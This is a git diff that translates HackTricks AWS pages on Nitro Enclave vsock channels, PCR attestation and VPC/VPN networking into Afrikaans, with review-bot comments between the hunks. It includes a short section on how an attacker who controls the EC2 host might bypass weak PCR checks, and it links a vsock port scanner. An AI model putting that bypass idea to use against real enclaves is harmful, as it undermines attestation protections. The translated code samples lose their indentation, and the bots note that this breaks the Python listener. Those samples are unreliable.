**`EnclaveCID`** kry:
nitro-cli describe-enclaves
 
 [
-  {
-    "EnclaveName": "secure-channel-example",
-    "EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
-    "ProcessID": 10131,
+{
+"EnclaveName": "secure-channel-example",
+"EnclaveID": "i-0bc274f83ade02a62-enc18ef3d09c886748",
+"ProcessID": 10131,
     "EnclaveCID": 16,
     "NumberOfCPUs": 2,
-    "CPUIDs": [
-      1,
-      3
-    ],
-    "MemoryMiB": 1024,
-    "State": "RUNNING",
-    "Flags": "DEBUG_MODE",
-    "Measurements": {
-      "HashAlgorithm": "Sha384 { ... }",
-      "PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
-      "PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
-      "PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
-    }
-  }
+"CPUIDs": [
+1,
+3
+],
+"MemoryMiB": 1024,
+"State": "RUNNING",
+"Flags": "DEBUG_MODE",
+"Measurements": {
+"HashAlgorithm": "Sha384 { ... }",
+"PCR0": "e199261541a944a93129a52a8909d29435dd89e31299b59c371158fc9ab3017d9c450b0a580a487e330b4ac691943284",
+"PCR1": "bcdf05fefccaa8e55bf2c8d6dee9e79bbff31e34bf28a99aa19e6b29c37ee80b214a414b7607236edf26fcb78654e63f",
+"PCR2": "2e1fca1dbb84622ec141557dfa971b4f8ea2127031b264136a20278c43d1bba6c75fea286cd4de9f00450b6a8db0e6d3"
+}
+}
 ]
 
> [!WARNING] -> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). +> Let daarop dat daar vanaf die gasheer geen manier is om te weet of 'n CID enige poort blootstel nie! Tensy jy 'n **vsock poort skandeerder soos** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner) gebruik. ### Vsock Server/Listener -Find here a couple of examples: +Vind hier 'n paar voorbeelde: - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
Simple Python Listener - ```python #!/usr/bin/env python3 @@ -173,30 +156,26 @@ s.listen() print(f"Connection opened by cid={remote_cid} port={remote_port}") while True: - buf = conn.recv(64) - if not buf: - break +buf = conn.recv(64) +if not buf: +break - print(f"Received bytes: {buf}") +print(f"Received bytes: {buf}") ``` -
- ```bash # Using socat socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!" ``` +### Vsock Kliënt -### Vsock Client - -Examples: +Voorbeelde: - [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
-Simple Python Client - +Simpele Python Kliënt ```python #!/usr/bin/env python3 @@ -212,64 +191,53 @@ s.connect((CID, PORT)) s.sendall(b"Hello, world!") s.close() ``` - +```markdown
- +``` ```bash # Using socat echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000 ``` - ### Vsock Proxy -The tool vsock-proxy allows to proxy a vsock proxy with another address, for example: - +Die hulpmiddel vsock-proxy stel in staat om 'n vsock-proxy met 'n ander adres te proxy, byvoorbeeld: ```bash vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml ``` - -This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`: - +Dit sal die **lokale poort 8001 in vsock** na `ip-ranges.amazonaws.com:443` stuur en die lĂȘer **`your-vsock-proxy.yaml`** mag hierdie inhoud hĂȘ wat toegang tot `ip-ranges.amazonaws.com:443` toelaat: ```yaml allowlist: - - { address: ip-ranges.amazonaws.com, port: 443 } +- { address: ip-ranges.amazonaws.com, port: 443 } ``` - -It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port): - +Dit is moontlik om die vsock adresse (**`:`**) wat deur die EC2 gasheer gebruik word te sien met (let op die `3:8001`, 3 is die CID en 8001 die poort): ```bash sudo ss -l -p -n | grep v_str v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) ``` - ## Nitro Enclave Atestation & KMS -The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF. 
+Die Nitro Enclaves SDK laat 'n enclave toe om 'n **kriptografies geskrewe atestering dokument** van die Nitro **Hypervisor** aan te vra, wat **unieke metings** spesifiek vir daardie enclave insluit. Hierdie metings, wat **hashes en platform konfigurasie registers (PCRs)** insluit, word tydens die atestering proses gebruik om die **identiteit van die enclave te bewys** en **vertroue met eksterne dienste te bou**. Die atestering dokument bevat tipies waardes soos PCR0, PCR1, en PCR2, wat jy voorheen teĂ«gekom het toe jy 'n enclave EIF gebou en gestoor het. -From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values: +Van die [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), is dit die PCR waardes: -
PCRHash of ...Description
PCR0Enclave image fileA contiguous measure of the contents of the image file, without the section data.
PCR1Linux kernel and bootstrapA contiguous measurement of the kernel and boot ramfs data.
PCR2ApplicationA contiguous, in-order measurement of the user applications, without the boot ramfs.
PCR3IAM role assigned to the parent instanceA contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.
PCR4Instance ID of the parent instanceA contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.
PCR8Enclave image file signing certificateA measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.
+
PCRHash van ...Beskrywing
PCR0Enclave beeld lĂȘer‘n Aaneengeskakelde meting van die inhoud van die beeld lĂȘer, sonder die afdeling data.
PCR1Linux kern en bootstrap‘n Aaneengeskakelde meting van die kern en boot ramfs data.
PCR2Toepassing‘n Aaneengeskakelde, in-volgorde meting van die gebruiker toepassings, sonder die boot ramfs.
PCR3IAM rol toegeken aan die ouer instansie‘n Aaneengeskakelde meting van die IAM rol toegeken aan die ouer instansie. Verseker dat die atestering proses slegs slaag wanneer die ouer instansie die korrekte IAM rol het.
PCR4Instansie ID van die ouer instansie‘n Aaneengeskakelde meting van die ID van die ouer instansie. Verseker dat die atestering proses slegs slaag wanneer die ouer instansie 'n spesifieke instansie ID het.
PCR8Enclave beeld lĂȘer onderteken sertifikaat‘n Meting van die onderteken sertifikaat gespesifiseer vir die enclave beeld lĂȘer. Verseker dat die atestering proses slegs slaag wanneer die enclave vanaf 'n enclave beeld lĂȘer onderteken deur 'n spesifieke sertifikaat geboot is.
-You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**. +Jy kan **kripto-grafiese atestering** in jou toepassings integreer en gebruik maak van voorafgeboude integrasies met dienste soos **AWS KMS**. AWS KMS kan **enclave atesterings valideer** en bied atestering-gebaseerde voorwaardesleutels (`kms:RecipientAttestation:ImageSha384` en `kms:RecipientAttestation:PCR`) in sy sleutelsbeleid. Hierdie beleid verseker dat AWS KMS operasies met die KMS sleutel **slegs toelaat as die enclave se atestering dokument geldig is** en aan die **gespesifiseerde voorwaardes** voldoen. > [!TIP] -> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. +> Let daarop dat Enclaves in debug (--debug) modus atestering dokumente genereer met PCRs wat uit nulles bestaan (`000000000000000000000000000000000000000000000000`). Daarom sal KMS beleid wat hierdie waardes nagaan misluk. ### PCR Bypass -From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement). 
+Van 'n aanvaller se perspektief, let daarop dat sommige PCRs dit moontlik maak om sekere dele of die hele enclave beeld te wysig en steeds geldig te wees (byvoorbeeld PCR4 kyk net na die ID van die ouer instansie, so om enige enclave beeld in daardie EC2 te draai sal hierdie potensiĂ«le PCR vereiste vervul). -Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections. +Daarom mag 'n aanvaller wat die EC2 instansie kompromitteer in staat wees om ander enclave beelde te draai om hierdie beskermings te omseil. -The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO. +Die navorsing oor hoe om nuwe beelde te wysig/te skep om elke beskerming te omseil (veral die nie so voor die hand liggende) is steeds TODO. ## References - [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) -- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) +- Alle dele van die Nitro tutoriaal van AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md index 03277bfd1..4b461f842 100644 
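Review bot: In hunk `@@ -80,80 +71,72 @@` the `nitro-cli describe-enclaves` sample JSON loses its indentation on every `+` line (`+{`, `+"EnclaveName": "secure-channel-example",`, `+"CPUIDs": [`) while the untouched context lines such as `"EnclaveCID": 16,` keep theirs, so the block renders half-indented; a translation should leave code samples byte-for-byte unchanged and only touch the prose around them. The same hunk also alternates between "enklave" (`hardloopende enklave-beelde`) and "enclave" (`met 'n **enclave** wat 'n beeld uitvoer`); pick one spelling for the whole file.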
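Review bot: In hunk `@@ -173,30 +156,26 @@` the translated Python listener is broken: the body of `while True:` is rewritten as `+buf = conn.recv(64)`, `+if not buf:`, `+break` with no indentation, which Python rejects with an IndentationError before the sample ever runs, and the replaced lines contained no text that needed translating. Restore the original indented `-` lines verbatim.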
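Review bot: In hunk `@@ -212,64 +191,53 @@` an empty `markdown` fence (an opening fence line tagged markdown followed immediately by a closing fence, both `+` lines) is inserted between the Python client and the socat client snippet; it renders as an empty code box and should be dropped. Two wording points in the same hunk: `kriptografies geskrewe atestering dokument` translates "signed" as "written", which loses the point that the Nitro Hypervisor signs the document, so use `kriptografies onderteken`; and the TIP keeps `debug (--debug) modus` although the flag actually used in the `nitro-cli run-enclave` line at the top of the file is `--debug-mode`, so align the flag name while translating.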
--- a/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md 
@@ -4,37 +4,37 @@ ## AWS Networking in a Nutshell -A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**). +'n **VPC** bevat 'n **netwerk CIDR** soos 10.0.0.0/16 (met sy **routeringstabel** en **netwerk ACL**). -This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**. +Hierdie VPC-netwerk is verdeel in **subnetwerke**, so 'n **subnetwerk** is direk **verwant** aan die **VPC**, **routering** **tabel** en **netwerk ACL**. -Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**. +Dan is **Netwerkinterfaces** wat aan dienste (soos EC2-instansies) geheg is, **verbonden** met die **subnetwerke** met **veiligheidsgroep(e)**. -Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**. +Daarom sal 'n **veiligheidsgroep** die blootgestelde poorte van die netwerk **interfaces wat dit gebruik**, **onafhanklik van die subnetwork** beperk. En 'n **netwerk ACL** sal die blootgestelde poorte tot die **hele netwerk** **beperk**. -Moreover, in order to **access Internet**, there are some interesting configurations to check: +Boonop, om **toegang tot die internet** te verkry, is daar 'n paar interessante konfigurasies om na te kyk: -- A **subnetwork** can **auto-assign public IPv4 addresses** -- An **instance** created in the network that **auto-assign IPv4 addresses can get one** -- An **Internet gateway** need to be **attached** to the **VPC** - - You could also use **Egress-only internet gateways** -- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. 
- - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) +- 'n **subnetwerk** kan **outomaties openbare IPv4-adresse toewys** +- 'n **instansie** wat in die netwerk geskep is wat **outomaties IPv4-adresse toewys, kan een kry** +- 'n **Internet-gateway** moet aan die **VPC** **geheg** wees +- Jy kan ook **Egress-only internet gateways** gebruik +- Jy kan ook 'n **NAT-gateway** in 'n **privaat subnet** hĂȘ sodat dit moontlik is om **verbinding te maak met eksterne dienste** vanaf daardie privaat subnet, maar dit is **nie moontlik om hulle van buite te bereik** nie. +- Die NAT-gateway kan **publiek** wees (toegang tot die internet) of **privaat** (toegang tot ander VPCs) ![](<../../../../images/image (274).png>) ## VPC -Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs... +Amazon **Virtual Private Cloud** (Amazon VPC) stel jou in staat om **AWS-hulpbronne in 'n virtuele netwerk** te begin wat jy gedefinieer het. Hierdie virtuele netwerk sal verskeie subnetwerke, Internet-gateways om toegang tot die internet te verkry, ACLs, Veiligheidsgroepe, IP's hĂȘ... ### Subnets -Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. +Subnetwerke help om 'n groter vlak van sekuriteit af te dwing. **Logiese groepe van soortgelyke hulpbronne** help jou ook om 'n **gemaklike bestuur** oor jou infrastruktuur te handhaaf. -- Valid CIDR are from a /16 netmask to a /28 netmask. -- A subnet cannot be in different availability zones at the same time. -- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. 
The second address is reserved for AWS DNS and the third address is reserved for future use. -- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** +- Geldige CIDR is van 'n /16 netmask tot 'n /28 netmask. +- 'n Subnet kan nie in verskillende beskikbaarheidsgebiede terselfdertyd wees nie. +- **AWS reserveer die eerste drie gasthost IP-adresse** van elke subnet **vir** **interne AWS-gebruik**: die eerste gasthostadres wat gebruik word, is vir die VPC-router. Die tweede adres is gereserveer vir AWS DNS en die derde adres is gereserveer vir toekomstige gebruik. +- Dit word **publieke subnetwerke** genoem vir diegene wat **direkte toegang tot die internet het, terwyl private subnetwerke dit nie het nie.**
@@ -42,15 +42,15 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi ### Route Tables -Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the: +Routeringstabelle bepaal die verkeerroutering vir 'n subnet binne 'n VPC. Hulle bepaal watter netwerkverkeer na die internet of na 'n VPN-verbinding gestuur word. Jy sal gewoonlik toegang vind tot die: -- Local VPC +- Plaaslike VPC - NAT -- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). - - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. -- VPC endpoints (to access S3 from private networks) +- Internet-gateways / Egress-only Internet gateways (nodig om 'n VPC toegang tot die internet te gee). +- Om 'n subnet publiek te maak, moet jy 'n **Internet-gateway** **skep** en **heg** aan jou VPC. +- VPC-eindpunte (om toegang tot S3 vanaf private netwerke te verkry) -In the following images you can check the differences in a default public network and a private one: +In die volgende beelde kan jy die verskille in 'n standaard publieke netwerk en 'n private een nagaan:
@@ -58,142 +58,138 @@ In the following images you can check the differences in a default public networ ### ACLs -**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges. +**Netwerk Toegang Beheer Lyste (ACLs)**: Netwerk ACLs is firewall-reĂ«ls wat inkomende en uitgaande netwerkverkeer na 'n subnet beheer. Hulle kan gebruik word om verkeer na spesifieke IP-adresse of reekse toe te laat of te weier. -- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections -- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed +- Dit is die mees algemene om toegang toe te laat/te weier met behulp van veiligheidsgroepe, maar dit is die enigste manier om gevestigde omgekeerde skulpies heeltemal te sny. 'n Gewysigde reĂ«l in 'n veiligheidsgroep stop nie reeds gevestigde verbindings nie. +- Dit geld egter vir die hele subnetwerk, wees versigtig wanneer jy goed verbied, want nodige funksionaliteit mag versteur word. ### Security Groups -Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\ -Usually this is used to open dangerous ports in instances, such as port 22 for example: +Veiligheidsgroepe is 'n virtuele **firewall** wat inkomende en uitgaande netwerk **verkeer na instansies** in 'n VPC beheer. Verhouding 1 SG tot M instansies (gewoonlik 1 tot 1).\ +Gewoonlik word dit gebruik om gevaarlike poorte in instansies te open, soos poort 22 byvoorbeeld:
### Elastic IP Addresses -An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account. +'n _Elastic IP-adres_ is 'n **statische IPv4-adres** wat ontwerp is vir dinamiese wolkrekenaars. 'n Elastic IP-adres word aan jou AWS-rekening toegeken, en is joune totdat jy dit vrystel. Deur 'n Elastic IP-adres te gebruik, kan jy die mislukking van 'n instansie of sagteware maskeer deur die adres vinnig na 'n ander instansie in jou rekening te herverdeel. ### Connection between subnets -By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on. +Standaard het alle subnetwerke die **outomatiese toewysing van openbare IP-adresse afgeskakel**, maar dit kan aangeskakel word. -**A local route within a route table enables communication between VPC subnets.** +**'n Plaaslike roete binne 'n routeringstabel stel kommunikasie tussen VPC-subnetwerke in staat.** -If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. +As jy 'n **subnet met 'n ander subnet verbind, kan jy nie die subnetwerke wat met die ander subnet verbind is, bereik nie; jy moet direk verbinding met hulle maak.** **Dit geld ook vir internet-gateways**. Jy kan nie deur 'n subnetverbinding gaan om toegang tot die internet te verkry nie; jy moet die internet-gateway aan jou subnet toewys. 
### VPC Peering -VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. +VPC-peering stel jou in staat om **twee of meer VPCs aan mekaar te verbind**, met behulp van IPV4 of IPV6, asof hulle deel van dieselfde netwerk is. -Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\ -If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ -Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. **You can't route through one VPC to get to another.** +Sodra die peerverbinding gevestig is, kan **hulpbronne in een VPC toegang verkry tot hulpbronne in die ander**. Die verbinding tussen die VPCs word deur die bestaande AWS-netwerkinfrastruktuur geĂŻmplementeer, en is dus hoogs beskikbaar sonder enige bandwydte-bottlenecks. Aangesien **gepeerde verbindings werk asof hulle deel van dieselfde netwerk is**, is daar beperkings wanneer dit kom by jou CIDR-blokreekse wat gebruik kan word.\ +As jy **oorlappende of duplikaat CIDR** reekse vir jou VPC het, dan **sal jy nie in staat wees om die VPCs** saam te peer nie.\ +Elke AWS VPC sal **slegs met sy peer kommunikeer**. 
As 'n voorbeeld, as jy 'n peeringverbinding tussen VPC 1 en VPC 2 het, en 'n ander verbinding tussen VPC 2 en VPC 3 soos getoon, dan kan VPC 1 en 2 direk met mekaar kommunikeer, soos VPC 2 en VPC 3, maar VPC 1 en VPC 3 kan nie. **Jy kan nie deur een VPC roete om by 'n ander te kom nie.** ### **VPC Flow Logs** -Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. +Binne jou VPC kan jy potensieel honderde of selfs duisende hulpbronne hĂȘ wat tussen verskillende subnetwerke kommunikeer, beide publiek en privaat, en ook tussen verskillende VPCs deur VPC-peeringverbindinge. **VPC Flow Logs stel jou in staat om IP-verkeersinligting vas te vang wat tussen jou netwerkinterfaces van jou hulpbronne binne jou VPC vloei**. -Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. +In teenstelling met S3-toeganglogs en CloudFront-toeganglogs, word die **logdata wat deur VPC Flow Logs gegenereer word, nie in S3 gestoor nie. In plaas daarvan word die logdata wat vasgevang word, na CloudWatch logs gestuur**. -Limitations: +Beperkings: -- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -- The following traffic is not monitored and captured by the logs. 
DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. -- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -- Traffic relating to an Amazon Windows activation license from a Windows instance -- Traffic between a network load balancer interface and an endpoint network interface +- As jy 'n VPC-gepeerde verbinding het, sal jy slegs die vloei logs van gepeerde VPCs wat binne dieselfde rekening is, kan sien. +- As jy steeds hulpbronne binne die EC2-Classic omgewing bestuur, kan jy ongelukkig nie inligting van hul interfaces verkry nie. +- Sodra 'n VPC Flow Log geskep is, kan dit nie verander word nie. Om die VPC Flow Log-konfigurasie te verander, moet jy dit verwyder en dan 'n nuwe een herskep. +- Die volgende verkeer word nie gemonitor en vasgevang deur die logs nie. DHCP-verkeer binne die VPC, verkeer van instansies wat bestem is vir die Amazon DNS-server. +- Enige verkeer wat bestem is vir die IP-adres van die VPC se standaardrouter en verkeer na en van die volgende adresse, 169.254.169.254 wat gebruik word om instansiemetadataversameling, en 169.254.169.123 wat gebruik word vir die Amazon Time Sync Service. +- Verkeer wat verband hou met 'n Amazon Windows aktiveringslisensie van 'n Windows-instansie +- Verkeer tussen 'n netwerklaaibalansierinterface en 'n eindpuntnetwerkinterface -For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. +Vir elke netwerkinterface wat data na die CloudWatch-loggroep publiseer, sal dit 'n ander logstroom gebruik. 
En binne elkeen van hierdie strome sal daar die vloei log gebeurtenisdata wees wat die inhoud van die loginskrywings toon. Elke een van hierdie **logs vang data vas gedurende 'n venster van ongeveer 10 tot 15 minute**. ## VPN ### Basic AWS VPN Components -1. **Customer Gateway**: - - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. -2. **Virtual Private Gateway**: - - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - - It is attached to your VPC and serves as the target for your VPN connection. - - VPG is the AWS side endpoint for the VPN connection. - - It handles the secure communication between your VPC and your on-premises network. +1. **KliĂ«nt Gateway**: +- 'n KliĂ«nt Gateway is 'n hulpbron wat jy in AWS skep om jou kant van 'n VPN-verbinding te verteenwoordig. +- Dit is essensieel 'n fisiese toestel of sagtewaretoepassing aan jou kant van die Site-to-Site VPN-verbinding. +- Jy verskaf routeringinligting en die openbare IP-adres van jou netwerktoestel (soos 'n router of 'n firewall) aan AWS om 'n KliĂ«nt Gateway te skep. +- Dit dien as 'n verwysingspunt vir die opstelling van die VPN-verbinding en bring geen addisionele koste mee nie. +2. **Virtuele Privaat Gateway**: +- 'n Virtuele Privaat Gateway (VPG) is die VPN-konsentrasie aan die Amazon-kant van die Site-to-Site VPN-verbinding. +- Dit is aan jou VPC geheg en dien as die teiken vir jou VPN-verbinding. +- VPG is die AWS-kant eindpunt vir die VPN-verbinding. 
+- Dit hanteer die veilige kommunikasie tussen jou VPC en jou plaaslike netwerk. 3. **Site-to-Site VPN Connection**: - - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - - This type of connection requires a Customer Gateway and a Virtual Private Gateway. - - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. -4. **Client VPN Endpoint**: - - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - - With Client VPN, each client device uses a VPN client software to establish a secure connection. +- 'n Site-to-Site VPN-verbinding verbind jou plaaslike netwerk met 'n VPC deur 'n veilige, IPsec VPN-tunnel. +- Hierdie tipe verbinding vereis 'n KliĂ«nt Gateway en 'n Virtuele Privaat Gateway. +- Dit word gebruik vir veilige, stabiele en konsekwente kommunikasie tussen jou datacentrum of netwerk en jou AWS-omgewing. +- Gewoonlik gebruik vir gereelde, langtermynverbindinge en word gefaktureer op grond van die hoeveelheid data wat oor die verbinding oorgedra word. +4. **KliĂ«nt VPN Eindpunt**: +- 'n KliĂ«nt VPN-eindpunt is 'n hulpbron wat jy in AWS skep om kliĂ«nt VPN-sessies in te stel en te bestuur. +- Dit word gebruik om individuele toestelle (soos skootrekenaars, slimfone, ens.) veilig met AWS-hulpbronne of jou plaaslike netwerk te verbind. +- Dit verskil van Site-to-Site VPN in die sin dat dit ontwerp is vir individuele kliĂ«nte eerder as om hele netwerke te verbind. 
+- Met KliĂ«nt VPN gebruik elke kliĂ«nttoestel 'n VPN-kliĂ«nt sagteware om 'n veilige verbinding te vestig. ### Site-to-Site VPN -**Connect your on premisses network with your VPC.** +**Verbind jou plaaslike netwerk met jou VPC.** -- **VPN connection**: A secure connection between your on-premises equipment and your VPCs. -- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. +- **VPN-verbinding**: 'n Veilige verbinding tussen jou plaaslike toerusting en jou VPCs. +- **VPN-tunnel**: 'n GeĂ«nkripteerde skakel waar data van die kliĂ«ntnetwerk na of van AWS kan beweeg. - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. +Elke VPN-verbinding sluit twee VPN-tunnels in wat jy gelyktydig kan gebruik vir hoĂ« beskikbaarheid. -- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +- **KliĂ«ntgateway**: 'n AWS-hulpbron wat inligting aan AWS verskaf oor jou kliĂ«ntgateway-toestel. +- **KliĂ«ntgateway-toestel**: 'n Fisiese toestel of sagtewaretoepassing aan jou kant van die Site-to-Site VPN-verbinding. +- **Virtuele privaat gateway**: Die VPN-konsentrasie aan die Amazon-kant van die Site-to-Site VPN-verbinding. Jy gebruik 'n virtuele privaat 